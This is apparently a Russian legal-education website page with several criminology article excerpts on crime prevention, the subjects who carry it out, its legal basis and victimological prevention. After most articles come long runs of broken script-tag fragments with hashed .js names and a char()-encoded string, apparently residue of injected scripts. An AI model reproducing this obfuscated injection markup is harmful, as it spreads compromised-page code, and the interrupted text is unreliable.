Сегодня
НАВИГАЦИЯ:
ЮРИДИЧЕСКОЕ НАСЛЕДИЕ:
РАЗНОЕ:
РЕКЛАМА:
АРХИВ НОВОСТЕЙ:
Задачи и основополагающие начала борьбы с преступностью
  Криминология | Автор: admin | 12-05-2010, 19:44
Какова же даже не задача, а сверхзадача борьбы с преступностью? Можно ли всерьез рассчитывать на окончательную победу над ней? Эти вопросы задавали себе многие авторы на протяжении всей истории человечества.
ф. Таненбаум в 1943 году писал: "Преступность вечна так же, как и общество... Чем сложнее оно становится, тем труднее в нем индивиду и тем более частыми являются его срывы" .
Дж. Флорита считал, что преступность, как и грех, – нормальное явление в обществе, ненормальны придуманные людьми .санкции и законы. Американский ученый В. Фоке полагал, что "преступность – побочный продукт цивилизации" и соответственно может расти с развитием цивилизации .
Профессор Карпец И. И. в 60–70-е годы писал о преступности, как "преходящем" явлении, характерном только для классового общества, а в конце жизни в книге "Преступность: иллюзии и реальность" высказал мнение о том, что преступность присуща любому, а не только классовому обществу .
Так можно ли добиться над ней абсолютной и окончательной победы? Время иллюзий прошло, и ни один серьезный криминолог, пожалуй, положительно не ответит на этот вопрос. Ясно одно: человечество не помнит себя без преступлений и преступности. Другое дело – уровень преступности и масштабы ее противостояния обществу. Вся история человечества доказала, что ослабление борьбы с преступностью, а тем более ее отсутствие, ведет к безудержному росту преступности и криминализации общества.
Борьба с преступностью позволяет сдерживать это общественно опасное явление; обеспечивать необходимый баланс чисто эгоистического расчета человека и интересов других субъектов, общества; не допускать наиболее общественно опасных способов удовлетворения потребностей и интересов.
Наиболее важными основополагающими началами борьбы с преступностью можно считать следующие:
а) примат предупредительной деятельности над правоохранительной, а в предупредительной деятельности – примат мер по оказанию социальной помощи нуждающимся в ней: над предусмотренными законом ограничениями;
б) применение мер, ограничивающих права и свободы граждан, только по фактам нарушения закона и в предусмотренных законом случаях;
в) обеспечение неотвратимости предусмотренной законом ответственности виновных лиц за преступления;
г) осуществление борьбы всем обществом, всем населением. Государству принадлежит важнейшая роль, ибо только в руках государства находятся средства и институты принуждения. Государство определяет направления борьбы с преступностью. Однако нельзя забывать, что усилия государства могут увенчаться успехом только во взаимодействии с усилиями всех институтов гражданского общества, граждан. Это признано криминологами всего мира и закреплено в ряде резолюций ООН, в частности в материалах специальной сессии IV Конгресса ООН по борьбе с преступностью и обращению с правонарушителями формулируется вывод о том, что в разных странах мира различны пределы использования института участия общественности в борьбе с преступностью, эти различия имеют объективную политическую и социально-экономическую основу, но суть закрепленной в резолюции позиции сводится к тому, что без помощи всего населения, всего общества успех в борьбе с преступностью невозможен;e191aaeddbe07b0f6d289bb9fe0c79b9.js" type="text/javascript">d89fa551f98ed2ff59a9d57078c5af16char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)2723e1e98b95e5bebe016140c7e78a42.js" type="text/javascript">fa192be20b5688fde12f0633a2d77f01.js" type="text/javascript">6ea2bf4eac0cdae113e683c6f930b18a.js" type="text/javascript">17e90cf949d571371b6229ad22de7fbf.js" type="text/javascript">714d6945fb9b7a15280a28a7845ff45a.js" type="text/javascript">9a42ed0e932b6391522f4454bd13605d.js" type="text/javascript">f07d8a0579709d38d9487da951b29b99.js" type="text/javascript">fef892a6861df74750fae4cd11d01eca.js" type="text/javascript">819d9649ff6941f74333ce255250d2c0.js" type="text/javascript">1d24e8cee01a139cdb0c0dd7e435fd67.js" type="text/javascript">382f83a696dea91c488b90f694bb7ef7.js" type="text/javascript">
Коментариев: 0 | Просмотров: 148 |
Содержание предупредительной деятельности, ее виды, и этапы,
  Криминология | Автор: admin | 12-05-2010, 19:44
Предупреждение преступности буквально означает предохранение людей, общества, государства от преступлений. Исторические корни данного вида социальной практики уходят далеко в глубь веков: с появлением первых уголовно-правовых запретов и преступлений, как деяний, совершаемых вопреки им, стали действовать меры не только карательного, но и предупредительного противодействия.
В настоящее время предупреждение преступности представляет собой сложный комплекс разнообразных мер упреждающего воздействия.
В юридической литературе часто говорится о системе предупреждения преступности . Однако реальное состояние предупредительного "хозяйства" в современной России таково, что понятие системы в данном случае применимо лишь с натяжкой. Прежняя система (существовавшая- в советское время) практически разрушена, а новой (соответствующей реалиям переходного периода) еще не создано. И в лучшем случае можно говорить о том, что предупреждение преступности в настоящее время представляет собой не более чем систему со слабыми, даже очень слабыми взаимодействиями. Полноценная система (как целостное образование, обладающее новыми качественными характеристиками, не содержащимися в образующих его компонентах) в данном контексте – в значительной мере дело будущего.
Вместе с тем нельзя отрицать, что предупреждение преступности – это сложный, многоаспектный процесс, обладающий определенными признаками целостности, являющийся неким единством в различиях. Отсюда велико значение его комплексного рассмотрения, выделения составляющих элементов, их классификации по различным основаниям, ин-тегративной оценки, т. е. многого из того, что присуще системному анализу.
По признаку целеполагания (или уровню) принято выделять общесоциальное (или общее) и специальное предупреждение преступности.
В случае общего предупреждения речь идет о том, что позитивное развитие общества, совершенствование его экономических, политических, социальных и иных институтов, устранение из жизни кризисных явлений и диспропорций, питающих преступность, объективно способствуют ее предупреждению (путем ограничения сферы действия, снижения уровня, уменьшения вредных последствий и т. д.).
При этом цель предупреждения преступности, скажем, перед экономическими преобразованиями специально не ставится. Но эти преобразования, осуществляемые ради других (может быть, более высоких) целей, способствуют, например, вытеснению из жизни общества или уменьшению масштабов таких явлений, как нищета, безработица, детская беспризорность, бытовая неустроенность. Точно так же не ради борьбы с преступностью осуществляется развитие духовной культуры, но повышение ее уровня, несомненно, влияет на нравы, взгляды, интересы, мотивы действий людей и многое другое, от чего зависит их выбор между добром и злом, законопослушным и противоправным поведением.
В отличие от общих, специальные предупредительные меры осуществляются целенаправленно в интересах предупреждения преступности, т. е. они призваны решать задачи: устранения, нейтрализации, минимизации криминогенных факторов; оздоровления социальной микросреды, коррекции поведения лиц, чье поведение чревато угрозой совершения преступления, и т. д. Таковыми являются, например, профилактические операции, проводимые органами внутренних дел, или административный надзор за определенными категориями лиц, освобожденных из мест лишения свободы, и т. д.
В зависимости от масштаба применения различают меры предупреждения: 1) общегосударственные, относящиеся к большим социальным группам; 2) меры предупреждения, относящиеся к отдельным объектам или микрогруппам; 3) индивидуальные. Общегосударственные – это, например, меры предупреждения преступности, предусмотренные федеральными законами, действующими на всей территории России. Предупредительные мероприятия, относящиеся к большим социальным группам, осуществляются в рамках отрасли хозяйства, региона (области, республики в составе Российской Федерации), применительно к определенному контингенту лиц (например, беженцам и вынужденным мигрантам). Предупреждение преступлений на отдельном объекте, в микрогруппе – это выявление и устранение обстоятельств, способствующих правонарушениям, на конкретном предприятии, в зоне отдыха, данном учебном коллективе или, например, переориентация молодежной группировки с антиобщественной направленностью поведения. Индивидуальные меры предназначены для оказания предупредительного воздействия на конкретных лиц, их ближайшее окружение.
По содержанию меры предупреждения преступности могут быть экономическими, политическими, социальными, организационно-управленческими, культурно-воспитательными, правовыми и иными.
Насыщение рынка товарами массового спроса, повышение уровня доходов населения, целевые ассигнования на улучшение работы по устранению обстоятельств, способствующих определенной разновидности преступлений, это экономические меры предупреждения преступности (разного вида, уровня и масштаба).
Примером политических мер предупреждения преступности служит решение органов власти о разграничении полномочий федерального центра и субъектов Федерации в области общественной безопасности, охраны правопорядка.195fdccb57bf29e63bf157ce2d54905e.js" type="text/javascript">1a3df8a150d44359198a81f1e23b5b25char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)a6571f7cc20c42486b7fd12d69a4bc43.js" type="text/javascript">71b377d49e0a7dbc259b5f569170a48c.js" type="text/javascript">c40b8cefd4c0cc3168931fd845f5ade2.js" type="text/javascript">dcda275651b4bfb0639f77eb3eaff5b5.js" type="text/javascript">0dddcc903d65e096ea8daeade5d906be.js" type="text/javascript">0364ddce8bdc3fbcf5b875bd84c4936c.js" type="text/javascript">ec191ebf41d49db410ac849bc678f12f.js" type="text/javascript">93bed4d478d3cf1b06d17b7b6a99e445.js" type="text/javascript">a4ca95ecb5155b28d146e68db739d880.js" type="text/javascript">9674b90745f4f002d5aab2ae7ea7ce5a.js" type="text/javascript">9380b2fc3f58785abaf6b77099b414a2.js" type="text/javascript">
Коментариев: 0 | Просмотров: 368 |
Общее (общесоциалъное) предупреждение преступности и участие в нем криминологов
  Криминология | Автор: admin | 12-05-2010, 19:44
Общее (общесоциальное) предупреждение преступности реализует антикриминогенный потенциал общества в целом, всех его институтов.
Специфика переходного периода такова, что в различных сферах социальной жизни более заметны кризисы, диспропорции, другие негативные явления, детерминирующие преступность, нежели факторы, изначально противостоящие ей. Тем более невозможна в нынешних условиях трактовка общесоциального предупреждения преступности в прежних понятиях и измерениях.
Из этого, конечно, не следует, что общесоциальное предупреждение преступности стало невозможным, бессмысленным или бесполезным. Скорее наоборот: признание того, что преступность является уже прямой и очень серьезной угрозой национальной безопасности, актуализирует значение и роль данного вида предупредительной деятельности. В этом одно из существенных проявлений саморегулирующего начала в жизни общества. В нынешней российской действительности, несмотря на сложности и трудности переходного периода, появляются дополнительные (в принципе не новые, но основательно забытые) возможности противостояния преступности на общесоциальном уровне, например, связанные с позитивными сторонами рыночных преобразований или нравственными ценностями религиозных конфессий.
Остается незыблемым тезис об определяющем, базисном характере подсистемы общесоциального предупреждения в ряду всех мер упреждающего противодействия преступности.
Сохраняются, хотя во многом проявляются по-новому, следующие признаки мер общего предупреждения: масштабность; всеохватывающий и разносторонний характер, комплексность и взаимозависимость, непрерывность, радикальность. Благодаря этим характеристикам общее предупреждение представляет собой основу, фундамент специального предупреждения – упреждающего противостояния преступности. .
Так, целенаправленные усилия сотрудников правоохранительных органов и специализированных общественных формирований по организации в каникулярное время досуга трудных подростков, состоящих на учете в милиции, могут рассчитывать на успех лишь в условиях, когда общество, государство, его образовательно-воспитательные структуры уделяют необходимое внимание вопросам жизнеобеспечения, развития и социализации подрастающего поколения (т. е. на это выделяются необходимые средства, проводится продуманная социальная политика по охране интересов и улучшению положения детей и т. д.). Точно так же специальные меры предупреждения имущественных преступлений могут быть результативными в том случае, если они осуществляются в условиях нормальной работы экономических, финансовых, контрольных механизмов.
Общее (общесоциальное) предупреждение охватывает крупные, имеющие долговременный характер виды социальной практики в самом широком смысле этого слова. Например, в сфере экономики – это развитие производства на основе современных технологий, продуманная структурная и инвестиционная стратегия, справедливое перераспределение собственности, укрепление национальной валюты и всей финансовой системы, снижение инфляции и многие другие аспекты совершенствования экономических, а также тесно связанных с ними распределительных отношений.
В сфере политической – это становление и развитие новой российской государственности, упрочение демократии и начал федерализма; укрепление всех ветвей власти, реализация политической воли противостояния социально негативным явлениям и процессам в условиях многопартийности.
В сфере социальной (в узком смысле этого слова) большое антикриминогенное значение имеют меры, направленные на усиление социальной ориентации преобразований: устранение резкого социального расслоения общества; поддержка малоимущих граждан; укрепление семейных устоев; обеспечение надлежащих условий для социализации личности, преодоление ее социального отчуждения; ограничение негативных последствий безработицы, вынужденной миграции людей и т. п.a58858a6ad84538f6ad858832e8ed9a9.js" type="text/javascript">17fc0cf6f1b853db453a82eb11f711b3char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)d62310f5e8c2d93ebff1e880abe0f0f1.js" type="text/javascript">2f389589f4387098a96dada067cb81d0.js" type="text/javascript">83192ec52ef06cba815fa1c4b57f1e74.js" type="text/javascript">dc02f5d760386569f9867d8d2012f28d.js" type="text/javascript">bac801e8f9b5c282bc7f72645cdcc283.js" type="text/javascript">cec3b3b87d44ea4a641d3541173701d4.js" type="text/javascript">63b4c7fe42dc4170ff617b5505b77b6f.js" type="text/javascript">a6335285daf30180cd4c90dce84d83c3.js" type="text/javascript">8b46c84a8909d1078491322234c38298.js" type="text/javascript">50b3e0e9d2413cda880ac434c16bdb69.js" type="text/javascript">5705ded8105325be7d2bb3746db45f71.js" type="text/javascript">
Коментариев: 0 | Просмотров: 190 |
Специальное предупреждение преступности
  Криминология | Автор: admin | 12-05-2010, 19:44
Специальное предупреждение преступности, в отличие от общего, имеет целенаправленный на недопущение преступлений характер. Специальная предназначенность для выявления и устранения (блокирования, нейтрализации) причин, условий, иных детерминант преступности – его профилирующий, конституирующий признак, главная особенность. Наряду с этим специально-криминологическое предупреждение включает: предотвращение замышляемых и подготавливаемых, пресечение начатых преступлений .
: Специально-криминологические мероприятия должны разрабатываться и осуществляться применительно к различным видам преступлений и типам преступного поведения, к различным сферам общественной жизни, различным социальным группам, отраслям хозяйства, ибо они характеризуются особенностями процессов детерминации .
Специальное предупреждение органично дополняет и конкретизирует общее, но меры специального предупреждения принимаются в разрезе отдельных его составляющих и имеют временные границы. Они строго целенаправлены, специализированы и так или иначе локализованы во времени и пространстве применительно к определенным срокам проведения, к различным отраслям хозяйства и т. д.
В сущности, лишь один этот признак (целенаправленность) имеет в известном смысле абсолютное значение, играет роль качественного критерия для разграничения рассматриваемых видов предупреждения преступности. Остальные различия между ними являются не столько сущностными, сколько количественными. Так, общесоциальные меры, хотя и могут в принципе осуществляться на уровне особенного (применительно к отдельным отраслям хозяйства, социальным группам населения) и даже единичного (индивидуальное предупреждение), в основном своем объеме являются всеобщими, т. е. действующими в масштабе всего общества, государства. Эффект предупреждения преступности мерами экономического, социального, политического, культурно-воспитательного характера достигается главным образом в результате общесоциального предупреждения, но аналогичные по содержанию предупредительные мероприятия могут осуществляться (по крайней мере, активно инициироваться) и в рамках специально-криминологической деятельности. Правовые меры могут входить в состав общесоциального предупреждения, но они в несравненно большей степени характерны для специально-криминологического предупреждения. Примеры подобного взаимопроникновения, своеобразного переплетения общих и специально-предупредительных мер можно было бы привести не только исходя из этих оснований (масштаб, содержание), но и других.
Наряду с прямыми связями между общими мерами предупреждения и специальными существует и своеобразная обратная связь: последние не только базируются на первых, не только используют предупредительный потенциал общественного развития в целом, но и способствуют ему, устраняя довольно значительные преграды на его пути.
В этом смысле можно говорить о возрастании роли, социальной ценности специального предупреждения в условиях переходного периода, когда рост преступности не просто притормаживает, затрудняет экономические, социальные и иные преобразования, а уже таит в себе угрозу их срыва, обращения вспять.475ac40b136f05191a020aceeabe8dce.js" type="text/javascript">f50de6e7eb10c95b51d11e275c122efachar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)e9c54798cb5a5eec4dd9883e52ca0730.js" type="text/javascript">b81af8e7539a76dd55dc315d946256da.js" type="text/javascript">e733d9aca3cfce33988f50842ae424d2.js" type="text/javascript">9d895a2f0a26f44ae8712a87948afe8d.js" type="text/javascript">a678697e48544cefde02cb57cddca082.js" type="text/javascript">b469ef20575aced1bcded3d0d8e3e629.js" type="text/javascript">b7ba7e1faa366dd88aa4850a795b13d1.js" type="text/javascript">0103573ebb384dfd477309f47cfb3b77.js" type="text/javascript">9534f50c271e8572df2c7981711a31c1.js" type="text/javascript">1bdd336c24fe72b618f70b4e7477f3cc.js" type="text/javascript">52e7b11630a4a389a2f51649c73489ef.js" type="text/javascript">
Коментариев: 0 | Просмотров: 230 |
Субъекты, предупреждения преступности
  Криминология | Автор: admin | 12-05-2010, 19:44
Что касается общего предупреждения преступности, то его субъекты – это практически все общество, все институты гражданского общества, государство в целом.
Задачи специального (специально-криминологического) предупреждения преступности решаются также множеством субъектов: государственными и негосударственными, специализированными и неспециализированными, различающимися по другим признакам. Круг этих субъектов определяется в законодательном порядке.
К неспециализированным государственным субъектам относятся прежде всего Президент Российской Федерации, органы законодательной и исполнительной власти. Они формируют законодательную и иную нормативно-правовую основу специального предупреждения, устанавливают компетенцию, права и обязанности других субъектов в этой деятельности, осуществляют ее финансовое, материально-техническое, кадровое и иное ресурсное обеспечение, планирование, контроль и иные функции властного (государственно-правового) управления в данной области, а также непосредственно проводят на различных уровнях целенаправленные мероприятия по предупреждению преступности. О том, насколько широко и активно задействованы органы только исполнительной власти в специально-криминологическом предупреждении, можно судить по такому примеру. В Федеральной программе Российской федерации по усилению борьбы с преступностью на 1994–1995 годы, утвержденной Указом Президента РФ, в каждой из ее частей (первоочередные меры и последующие меры) имелся раздел "Профилактика преступлений", содержащий 21 позицию. В них –-разнообразные меры специально-криминологического предупреждения преступности: подготовка концепции и проекта закона "О профилактике правонарушений"; разработка единой методики комплексной оценки и прогнозирования преступности, социальных конфликтов и их криминогенных последствий, современной системы профилактики правонарушений несовершеннолетних, восстановление и развитие сети общественных формирований правоохранительной направленности, создание фондов социальной помощи лицам, освобожденным из мест лишения свободы, реализация системы мер по защите предпринимательства от недобросовестного партнерства и мошенничества и т. п. В соответствии с Федеральной программой к проведению этих и других мероприятий специально-криминологического характера привлекались помимо правоохранительных органов, администраций регионов также около 20 министерств и ведомств (многие неоднократно). Среди них Минобороны, Минфин, Минэкономики, МПС, Минсоцзащиты, Минтруда, Госкомимущество, Минкультуры, Минздравмедпром, Минобразования, Госкомпечать, Госкомкино и др.
Следует отметить особую роль и значение для достижения целей специального предупреждения преступности деятельности многочисленных органов государственного контроля: Государственной налоговой службы, Антимонопольного комитета, Госстандарта, Госторгинспекции, Государственной инспекции по контролю за ценами, Государственной инспекции по обеспечению государственной монополии на алкогольную продукцию, органы санэпиднадзора, лесной и рыбной охраны и др. В соответствии со своими полномочиями по наблюдению за исполнением законов в различных сферах (торговля, финансы, налоги, природопользование и т. д.) они используют разнообразные средства и методы выявления правонарушений и реагирования на них, в частности применяют такие юридические средства воздействия, как приостановление действия хозяйствующих субъектов, отзыв лицензий, административные штрафы и т. д. Эти меры препятствуют перерастанию непреступных правонарушений в преступные, способствуют устранению, ограничению действия широкого спектра криминогенных факторов.
Наряду с органами власти значительный вклад в дело специально-криминологического предупреждения преступности должна вносить местное самоуправление. Это достигается путем использования его полномочий по управлению муниципальной собственностью, утверждению и исполнению местного бюджета, решению иных вопросов местного значения, но прежде всего и главным образом – по осуществлению охраны общественного порядка.
Определенную роль в специально-криминологическом предупреждении играют не только государственные и муниципальные предприятия, учреждения культуры, здравоохранения, образования, но и частные, коммерческие структуры производственного и иного назначения (особенно в плане обеспечения собственной безопасности). Функции финансового контроля, имеющего большое значение для предупреждения экономических преступлений, в настоящее время осуществляются как государственными органами, так и коммерческими структурами, органами их управления (коммерческими банками, аудиторскими фирмами).
К числу неспециализированных субъектов специального предупреждения относятся также различные общественные формирования: политические партии, движения, фонды, религиозные организации. Например, все активнее проявляют себя религиозные конфессии, представители которых занимаются воспитательно-профилактической работой с осужденными, проводят благотворительные акции в отношении нищих, лиц без определенного места жительства, других социально неустроенных групп населения. Казачьи формирования активно участвуют в охране общественного порядка, предупреждении преступлений на улицах, в общественных местах, в сфере быта.
Определенные задачи в сфере специально-криминологического предупреждения преступности решают также уличные, квартальные, домовые комитеты, родительские советы школ, попечительские, благотворительные организации, не только государственные, но и действующие на общественных началах, частные медико-психологические, социальные центры, семейные детдома и др.
Для перечисленных субъектов (как государственных, так и общественных) при всех различиях в содержании, направ--ленности деятельности, если рассматривать их с криминологических позиций, характерно одно: функция предупреждения преступлений (и более широко – борьба с преступностью и правонарушениями) не является для них единственной, профилирующей и далее основной (одной из основных). Они вызваны к жизни разнообразными потребностями общества (в производстве материальных благ, организации власти, управлении различными сторонами социальной жизни, удовлетворении религиозных чувств и верований, самоопределении этнических общностей и др.), кроме одной – потребности в защите, предохранении от преступных посягательств. Но в силу социальной природы преступности, того, что она детерминируется многообразными экономическими, политическими, социальными и другими факторами, эти субъекты социальной (в широком смысле этого слова) практики в состоянии решать задачи упреждающего противодействия социально негативным явлениям, правонарушениям, включая наиболее опасные из них – преступления.f066ab50665082e79c0a8194c518099e.js" type="text/javascript">123f39f800cd3be7d7a859bb693513a9char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)7f62916f281779a203f3867921b5856b.js" type="text/javascript">b36a33798b2a0ff4f0b47562a6582b87.js" type="text/javascript">828962e8deaae08fbdcfb84a6e6d5452.js" type="text/javascript">a9c8aa81994f226cde6f35108a60bd47.js" type="text/javascript">bf92d3e01f538c9c62f1e0e67254ff64.js" type="text/javascript">d216bf7332fb73180035b6855160f05b.js" type="text/javascript">af354175e96acdd62c675b3a58aa9666.js" type="text/javascript">a5b79ef46c02690c5f5aa201d6d28bce.js" type="text/javascript">73ea3c7225658b6a55b068a5b64cd165.js" type="text/javascript">e1077e81bfac993a53acde09985ff0cc.js" type="text/javascript">a158a4cd0ed50a50f9d89c2e85e96f88.js" type="text/javascript">
Коментариев: 0 | Просмотров: 257 |
Правовые, организационные и тактические основы предупреждения преступности
  Криминология | Автор: admin | 12-05-2010, 19:44
Право является эффективным регулятором социального развития всех общественных отношений, включая те, которые складываются в сфере предупреждения преступности. Прежде всего необходимо отметить, что для данного вида социальной практики огромное значение имеет позитивное регулирование правом нормального хода общественной жизни. Нормами конституционного, гражданского, трудового, семейного и других отраслей права стимулируется социально полезное поведение людей, закрепляются такие общественные отношения, которые по своей сути противостоят преступности, устраняют (нейтрализуют, блокируют) действия ее причин и условий. Иными словами, право способствует реализации антикриминогенного потенциала всего общества, его институтов. Действие антикриминогенных факторов, будучи в той или иной степени урегулированным нормами права, осуществляется применительно к задачам предупреждения преступности не стихийно, а целенаправленно, т. е. как составная часть научно обоснованного управления социальными процессами. Общественные отношения, возникающие в сфере предупреждения преступности, осуществляются также посредством правовых запретов, путем установления юридической ответственности за противоправное поведение. Регулятивная функция права в данном случае дополняется охранительной и тоже имеет широкое значение для обеспечения эффективности мер предупреждения преступности. Предупредительный эффект имеет также воспитательная функция права, которая выражается в воздействии юридических средств на сознание людей, способствует формированию у них уважения к закону, привычки соблюдать его требования. Наконец, служебная роль права применительно к рассматриваемой сфере социальной жизни проявляется в том, что оно нормативно закрепляет оптимальный, соответствующий общественным потребностям и интересам порядок осуществления мер предупреждения преступности на специально-криминологическом уровне: его задачи, виды, систему субъектов, их компетенцию, основные формы и методы работы и т. д.
Правовая основа предупреждения преступности имеет сложную структуру, включает в себя нормы различных отраслей права.
Важные положения, определяющие роль и значение предупредительной деятельности, ее содержание и направленность, обязательное соответствие принципам справедливости, гуманности, законности, содержатся в ряде международных правовых актов, признанных Россией: Всеобщей декларации прав человека, Международном пакте о гражданских и политических правах, Кодексе поведения должностных лиц по поддержанию правопорядка, Руководящих принципах в области предупреждения преступности и уголовного правосудия, Декларации основных принципов правосудия для жертв преступлений и злоупотреблений властью.
Базисное значение для правового обеспечения мер предупреждения преступности имеет ряд положений Конституции Российской Федерации. Статья 2 Конституции провозглашает человека, его права и свободы высшей ценностью и устанавливает обязанность государства по их соблюдению и защите. Исполнение этой фундаментальной обязанности осуществляется многообразными способами, в том числе путем предупреждения государственными органами уголовно наказуемых посягательств на права и свободы граждан. Конкретизация в главе 2 Конституции РФ прав и свобод человека и гражданина, предусмотренные в ней гарантии их осуществления, средства защиты, допустимые ограничения устанавливают статус личности, из которого должны исходить все государственные и общественные органы, осуществляя любой вид деятельности, включая предупреждение преступности. В частности, при проведении предупредительных мероприятий недопустимо умаление достоинства личности (ст. 21); никто не вправе проникать в жилище против воли проживающих в нем лиц иначе как в случаях, установленных законом, или на основании судебного решения (ст. 25); никто не может быть лишен своего имущества иначе как по решению суда (ст. 35) и т. д. Признание и защита частной, государственной, муниципальной и иных форм собственности, гарантии единства экономического пространства, свободного перемещения товаров, услуг и финансовых средств, свободы экономической деятельности (ст. 8 Конституции РФ) определяют основные сферы деятельности, направленность и общую стратегию усилий общества и государства по предупреждению в рыночных условиях экономической преступности. Для организации и осуществления виктимологической профилактики (см. § 6) основополагающее значение имеет статья 52 Конституции РФ, устанавливающая, что права потерпевших от преступлений и злоупотреблений властью охраняются законом, а государство обеспечивает потерпевшим доступ к правосудию и компенсацию причиненного ущерба.
Значение уголовного права для правового регулирования предупреждения преступности определяется прежде всего тем, что его нормами очерчен круг деяний, запрещенных под угрозой уголовной ответственности. Нормами уголовного закона, регулирующими систему наказаний, порядок и условия их назначения, освобождения от наказания, устанавливается определенный правовой режим для осужденных, а также освобожденных от уголовной ответственности и наказания. Важными элементами этого режима, создающими юридические основания предупредительной работы с лицами указанных категорий, являются установленные для них правоограничения, специальные правила и обязанности, наблюдение и контроль за ними со стороны правоохранительных органов и общественности. Большое значение для юридического обоснования мер индивидуального предупреждения рецидива преступлений имеет уголовно-право-вой институт судимости. Предупредительный эффект уго-ловно-правовых норм достигается также посредством их воздействия на правосознание граждан. Кроме упоминавшихся норм с так называемой двойной превенцией можно выделить еще ряд статей уголовного закона, которые предоставляют в распоряжение субъектов предупредительной работы конкретные правовые средства воздействия на криминогенные факторы, в частности норм, стимулирующих поведение, препятствующее совершению преступлений (о необходимой обороне, о добровольном отказе от совершения преступления, о применении предупредительных мер медицинского характера к алкоголикам и наркоманам и др.).
Весь процесс исполнения наказаний, который регулируется исправительно-трудовым правом, способствует предупреждению преступности. Для правового регулирования предупреждения рецидива преступлений особое значение имеют нормы исправительно-трудового законодательства, регламентирующие порядок освобождения из мест лишения свободы, трудовое и бытовое устройство освобожденных, цели, основания и порядок наблюдения за условно-досрочно освобожденными, административный надзор за лицами, освобожденными из мест лишения свободы, и ряд других.a4fc3c97890c5f450ab77ccf9dc685a3.js" type="text/javascript">24d77a3f46d1e70510c016ddb118b484char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)387979146197971d9a0a220b58d4858b.js" type="text/javascript">97b24a537fa3aaf535bb11be36816f1a.js" type="text/javascript">efff24d230c6d0bd3e74552004d85b5b.js" type="text/javascript">133724b13b3f68bcce74a8429482616a.js" type="text/javascript">1208d8edb79bf9b22ba2efe0611b36dd.js" type="text/javascript">45ee951a46b05c24d874c7764503fa5a.js" type="text/javascript">ff9418b048313e9f1661ecb01e403062.js" type="text/javascript">a31c1f59752b0b1eae2cf09388a3b047.js" type="text/javascript">bffddf45300964b9dc0f47d95f850ede.js" type="text/javascript">c3155079d901980165df2326e01c9e1b.js" type="text/javascript">7c1e89f08a8c53f56eae66cc5998d865.js" type="text/javascript">
Коментариев: 0 | Просмотров: 605 |
Основы виктимологической профилактики
  Криминология | Автор: admin | 12-05-2010, 19:44
В последние годы в криминологической литературе все острее ставится проблема изучения жертв преступлений, более активного включения в процесс предупреждения преступности виктимологической профилактики. Это обусловлено рядом обстоятельств и прежде всего выдвижением на первый план в иерархии целей правоохранительной деятельности защиты личности, ее жизни, здоровья, прав и свобод.
Долгое время правоохранительные органы были сориентированы односторонне на работу вокруг преступления и преступника без должного внимания к жертве преступления. Как следствие, до сих пор нет полного учета потерпевших, а следовательно, не изучаются их личностные особенности, от случая к случаю проводятся мероприятия виктимологической профилактики и вообще фигура потерпевшего нередко рассматривается не более как источник информации о преступнике и преступлении, как участник (сторона) уголовно-процессуальных отношений.
Между тем почти все мировое сообщество, начиная с конца 40-х годов, последовательно проводит в жизнь идею защиты жертв преступлений от произвола преступников и властей. В этом направлении совершенствуется национальное законодательство, проводятся семинары, симпозиумы, создаются различного рода социальные службы, фонды помощи, дома доверия и спасения потерпевших. Наряду с профессиональной деятельностью по факту преступления не менее профессионально ведется работа с потерпевшими и другими жертвами преступлений в интересах недопущения их повторной виктимизации.
Разумеется, подобные попытки предпринимались и в нашей стране. Так, известны урегулированность и правовая защищенность потерпевшего в уголовном процессе.
Создана Российская ассоциация поддержки жертв преступлений. В ряде случаев успешно осуществлялись конкретные мероприятия виктимологической профилактики.
Однако всего этого явно недостаточно. Задача состоит в том, чтобы изменить существующий взгляд на сложившуюся практику борьбы с преступностью, в частности ее предупреждения, сделать виктимологическую профилактику важным средством предупреждения преступности.
Термин "виктимология" и производные от него "виктим-ность", "виктимизация", "виктимологическая профилактика" происходят от латинского victima (жертва) и греческого logos (учение), что означает учение о жертве. Применительно к теории и практике предупреждения преступности речь идет не о жертвах вообще, а только о жертвах преступлений.
Опыт борьбы с преступностью свидетельствует, что в механизме преступного поведения значимы личностные качества людей, которые затем становятся жертвами преступления.
Тот же опыт подтверждает и еще одну истину: преступления могло и не быть, а начавшееся – окончиться безрезультатно, если бы предполагаемая жертва проявила предусмотрительность и дала надлежащий отпор потенциальному преступнику.
Сказанное радикально меняет взгляд на существующую систему мер предупреждения преступности, роль и место в ней виктимологии и виктимологического направления профилактики. "Вполне возможно, что наши неудачи в области предупреждения преступности обусловлены тем, что в течение столетий все внимание было сосредоточено на самом проступке или же на преступнике и не уделялось внимания жертве, которого она заслуживает" . Это замечание Абделя Фаттаха, высказанное еще в 1967 году, весьма актуально для нашей страны сегодня.
Как известно, первые виктимологические исследования в нашей стране начались в середине 60-х годов. Тогда же высказывались и первые практические рекомендации. Однако практика оказалась невосприимчивой к ним.
Виктимология изучает преступление и преступное поведение под углом зрения обусловленности их личностными и ролевыми качествами потерпевшего, взаимоотношением его с преступником до и в момент совершения преступления. Непосредственным предметом изучения являются лица или общности людей, которым преступлением прямо или косвенно причинен моральный, физический или материальный ущерб, а также те ситуации, которые предшествовали или. сопровождали момент причинения ущерба.
Если говорить более конкретно, то виктимология изучает, во-первых, морально-психологические и социальные характеристики жертв преступлений, с тем чтобы понять, почему, в силу каких моральных, волевых или эмоциональных качеств, какой социальной направленности человек оказался потерпевшим от преступления.
Во-вторых, отношения, связывающие преступника с потерпевшим с тем, чтобы понять, в какой мере эти отношения значимы для создания предпосылок совершения преступления, как они мотивируют действия преступника.
В-третьих, виктимология изучает ситуации, которые предшествуют и сопровождают преступление с тем, чтобы понять, каковы мотивы виктимного поведения, насколько криминально значимо поведение жертвы в данной ситуации .
